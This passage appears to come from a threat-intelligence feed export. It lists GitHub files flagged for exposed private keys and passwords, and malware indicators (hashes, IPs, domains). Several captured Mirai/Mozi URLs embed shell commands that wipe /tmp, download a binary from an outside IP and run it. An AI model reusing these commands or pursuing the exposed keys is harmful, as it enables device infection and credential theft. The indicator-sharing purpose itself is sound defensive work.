"SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f82dec2051836821828ae7b84b99aa84aa4885c4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684670995 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7d51b93711e35b3ac97f4d483f87d4c8bbedb292", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "33cbe7fb2d127e8efd7dd98d808db8c223d89ec8", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684863717 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-24T18:03:58+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "c1b015cb6cdff6b28071e77e09e43bd87dbecd4f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": 
{ + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "56101d6fa71af13ea5eef67f7cf0b088d6334e9d", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685026090 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "3352e1c8441c1eb0d2a6b9968575d4aab71e566e", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f4e19cdb63d2aa490e1c754d5d7bf4a640fa7599", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684940638 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-06-10T21:39:20+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "362cc87c04580fefb42e28c780b07b1d78ca9430", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "d5f9b30c3816d0af4f9f63b4260be814a9b27a68", + "info": { + 
"authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686439393 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-22T00:36:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b213f7127b8fbfe76e0cc076b4381618b9e6ef61", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "147e80f0c70f6cd4d923bfc09e3de7ea37f93601", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686179309 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-05T18:55:57+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "54a3d4900f0af60ee79d5939c4dfc2ff17b333a1", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "163839df539930714366aac403a8fc32f592c3ff", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1683302157 + } + } + ], + "rules": null, + "url": 
"https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "b7f7c981d54f93a58af9a9d6024f4907f1c49c6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/bartlomiejkrawczyk/PAINT-23L", + "numberOf": { + "contributors": 9, + "files": 10 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734317546081, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T14:58:22+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "9925f833b3b4ae766ebcd0d3e6d65f56f3a728f7", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "4e8bd797c4986e94a5d6a8ed296391b6c6d0e5cc", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751362 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2024-04-10T15:16:02+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + 
"severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "a1e944fbfd7ea5b6cc4445b36b7c20fcf04dbc21", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README_PL.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "7bb835f3c70c795af6b0905acac54df259363db9", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751372 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README_PL.md" + }, + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdf8fc37755c78a240b77641a97b61bd94b645e2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "026768532bcf4dd2d210a5a737ecd360836b94c2", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { 
+ "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b912425818c603960dd60f29a9bcc84f5715b090", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "1d2eb46187084a1968523de96477b7fb7c6b8d86", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": 
"example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "748ba40c667039a0de88a0b38482265ad01c2a6f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "796973b223778cd4d5c07b4787d2ec00704fd325", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": 
null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "e90f2df5fdb22056e360ee8c19335d90047498fa", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "4256b013e8f6de1cd19a09cae9a90e7f0c92ccc9", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": 
"2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "a4fc7c10ad0a1ed8c44199ca8245e8aa080cc97f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "982e16c0481ef7b95ca105769c783336c99cdc6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/CrustyCracker/Wordle", + "numberOf": { + "contributors": 2, + "files": 11 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734319944338, + "source": "github" + } + ], + "seqUpdate": 1728734319944338 + }, + "ioc/common":{ + "items": [ + { + "id": "6337a9653cd46b5e2fc5394696201951027905b6", + "type": "file", + "dateFirstSeen": "2024-10-05T00:00:00+03:00", + "dateLastSeen": "2024-10-05T00:00:00+03:00", + "seqUpdate": 15996048022320, + "hash": [ + "73fe053e733bd116d605b76e02b74fb1456326a7", + "fe16a85a3f0094134eef4ba209c188a186ed269de90a6b5a84bcc4b90470cc79", + "b372fd09864d839112b79b7f0675f7df" + ], + "malwareList": [ + { + "name": "CobInt", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Cobalt", + "title": "Attacks of Cobalt gang based on using CobInt" + } + ] + }, + { + "id": "7e9e25521f410ca468f64f7d72993e05a5de6a97", + "type": "file", + "dateFirstSeen": "2024-10-02T00:00:00+03:00", + "dateLastSeen": "2024-10-02T00:00:00+03:00", + "seqUpdate": 15996750885890, + "hash": [ + 
"325504b23944b32ecd93579a470e51d6c0a49bfd", + "eb1603d2619a3e736a52ca4fa3ca942eea0349908c482eb004b45f6f820edb77", + "b33cd8d369a7167351c69fe57bae0bb1" + ], + "malwareList": [ + { + "name": "Silence.ProxyBot", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Silence", + "title": "Silence’s mass email sending to Russian banks" + }, + { + "name": "Silence", + "title": "Silence’s mass email sending to Russian banks" + } + ] + }, + { + "id": "d5e2db0967d73c6c462b389918a7dc7e0bddc66b", + "type": "file", + "dateFirstSeen": "2024-10-01T00:00:00+03:00", + "dateLastSeen": "2024-10-01T00:00:00+03:00", + "seqUpdate": 15997038594768, + "hash": [ + "fdcb8c6370cd844989fc913b8807401cfbea535b", + "ba25262913c9581dfc1bb14f28b2eff9e8cab2027fad217208ac25c1215a9489", + "01207851e364ddc432139da8c6287dff" + ], + "malwareList": [ + { + "name": "CobInt", + "aliases": [] + } + ], + "threatList": [ + { + "name": "Cobalt", + "title": "Attack of Cobalt gang" + }, + { + "name": "Cobalt", + "title": "Attack of Cobalt gang" + } + ] + }, + { + "id": "7caa3b26dc9ff3b48bc9d04f535ab95efa8da3ef", + "type": "file", + "dateFirstSeen": "2024-10-05T00:00:00+03:00", + "dateLastSeen": "2024-10-05T00:00:00+03:00", + "seqUpdate": 16109699365784, + "hash": [ + "65a3e6f290962d9e620bffe2b13c21c06fc0486c", + "42ded82ef563db3b35aa797b7befd1a19ec925952f78f076db809aa8558b2e57", + "c9ed44cfc79c52e12fcf969c78a83ad4" + ], + "malwareList": [ + { + "name": "FlawedAmmyy", + "aliases": [] + } + ], + "threatList": [ + { + "name": "TA505", + "title": "Malspam campaign using attachments weaponized with FlawedAmmy RAT" + } + ] + }, + { + "id": "8091f27e36767447180b42675328a77c0ac8058a", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17270610151738, + "ip": [ + "45.61.169.126" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": 
"9c0f18dccca37a768eb2f7750203b2fa22714139", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17270636175525, + "ip": [ + "8.216.85.26" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "2b770d697fa23c3f37a39383874fb1f208d4fdef", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "asas11.com", + "seqUpdate": 17270700146547, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "af93635787b966ee83936ffd3459581dddd6d93b", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "icasshop.com", + "seqUpdate": 17270700147327, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "3de83b1f1b29429a0735b815e2b8e4704b9351b0", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "0717it.com", + "seqUpdate": 17270700148082, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "126e43f40540e34e47c4080b1d857cf910320715", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "wqywt.com", + "seqUpdate": 17270700148956, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "37a711836f575819fd51a61d316710598f7bc1cf", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "lfsyys.com", + "seqUpdate": 
17270700149627, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "43ceedccb81cb4d146f6d3b9723cd0438ceeb7da", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "domain": "sxsfsm.com", + "seqUpdate": 17270700150474, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "5dc9d78224a53f52c486a870979ea66022272430", + "type": "file", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271000340866, + "hash": [ + "60ed30bea0f9e2db5cc1f45241c7473c", + "62b33edc9682bc780bc68d34ae7b19eaf429e42d", + "fc28d2eaee1fd3416fe3e0cd4669df3ac178c577e3a8c386b1c34c3146afb8d6" + ], + "malwareList": [ + { + "name": "Babuk", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "6ecb34d68b26c7bc369dd209f0db9cc3a9c6a8c7", + "type": "network", + "dateFirstSeen": "2024-09-23T00:00:00+03:00", + "dateLastSeen": "2024-09-23T00:00:00+03:00", + "seqUpdate": 17271228138607, + "ip": [ + "95.179.134.240" + ], + "malwareList": null, + "threatList": [ + { + "name": "APT41", + "title": "APT41 - New indicators have been found" + } + ] + }, + { + "id": "375efaa5e042b289579c147dd1c95d9b8ccdbee4", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271390119447, + "ip": [ + "147.78.12.202" + ], + "malwareList": null, + "threatList": [ + { + "name": "Mustang Panda", + "title": "Mustang Panda - New indicators have been found" + } + ] + }, + { + "id": "d73f92538c09bb2ee803865d348e845e9cddf4ed", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271402174214, + "ip": [ + "45.61.165.15" + ], + "malwareList": null, + "threatList": 
[ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "03e5c42fbc278e9991cc2dcf0624e03915c5ec40", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "mozhuzs.com", + "seqUpdate": 17271444135820, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "41d5d53349f8a71a42e3be3415da349af612d4dd", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "zscqwd.com", + "seqUpdate": 17271444136481, + "malwareList": null, + "threatList": [ + { + "name": "MageCart", + "title": "MageCart - New indicators have been found" + } + ] + }, + { + "id": "e6319fb8e3c3ed28fc4d9fc1321ef25d390c8cfa", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "cpanel.co9dance.com", + "seqUpdate": 17271551822563, + "malwareList": [ + { + "name": "Emotet", + "aliases": [ + "Emotet", + "Geodo" + ] + } + ], + "threatList": null + }, + { + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "wehermes.com", + "seqUpdate": 17271570168080, + "malwareList": null, + "threatList": [ + { + "name": "Oilrig", + "title": "Oilrig - New indicators have been found" + } + ] + }, + { + "id": "bcc73e2e28e4eef80b7dee2101fa8c4a9e64b5ab", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271588170425, + "ip": [ + "172.86.121.163" + ], + "malwareList": null, + "threatList": [ + { + "name": "Nitrogen", + "title": "Nitrogen - New indicators have been found" + } + ] + }, + { + "id": "2eddf1bc0e8231a038d28f9166efffb3fd185283", + "type": "network", + 
"dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "4kqd3hmqgptupi3p.prudential.com", + "seqUpdate": 17271636188505, + "malwareList": [ + { + "name": "Cerber", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "0f7551c45b3330faf80fc5a4b09a13092e514413", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "36230643643123223.jingbocheye.com", + "seqUpdate": 17271673081477, + "malwareList": [ + { + "name": "HttpBrowser", + "aliases": [ + "TokenControl", + "HttpDump" + ] + } + ], + "threatList": null + }, + { + "id": "9906d07d097cc924eff5bebd9d3f8e660345c3a2", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "domain": "crm.shark-net.com", + "url": "https://crm.shark-net.com/GponForm/diag_Form?images/", + "seqUpdate": 17271737986012, + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "ec33fcd3dc71367486709722bae67dea3b924a84", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.92.117/shell?cd+/tmp;rm+-rf+*;wget+http:/117.213.253.18:38776/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271738426502, + "ip": [ + "185.186.92.117" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "4f9f3e22fea80314eddc8eb0c35ea27d3e54ffa5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271738506597, + "ip": [ + "117.213.253.18" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "18b524ecd283508f1340355442a58ac8cd594fc6", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": 
"2024-09-24T00:00:00+03:00", + "url": "https://185.186.93.9/shell?cd+/tmp;rm+-rf+*;wget+http://102.41.67.208:49151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271740508590, + "ip": [ + "185.186.93.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "f42ff9d4ad6017086ab63528a48c8fcbdb4164fd", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "url": "http://185.186.93.9/shell?cd+/tmp;rm+-rf+*;wget+http:/102.41.67.208:49151/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws", + "seqUpdate": 17271740588691, + "ip": [ + "185.186.93.9" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "e6cf94c78ccaf47953aaec05206114d4abfce97d", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271740668773, + "ip": [ + "122.96.31.11" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": "17b83bf8ec081f164b64e07a94b13f975a0830a5", + "type": "network", + "dateFirstSeen": "2024-09-24T00:00:00+03:00", + "dateLastSeen": "2024-09-24T00:00:00+03:00", + "seqUpdate": 17271740828913, + "ip": [ + "150.246.185.107" + ], + "malwareList": [ + { + "name": "Mirai", + "aliases": [] + } + ], + "threatList": null + }, + { + "id": 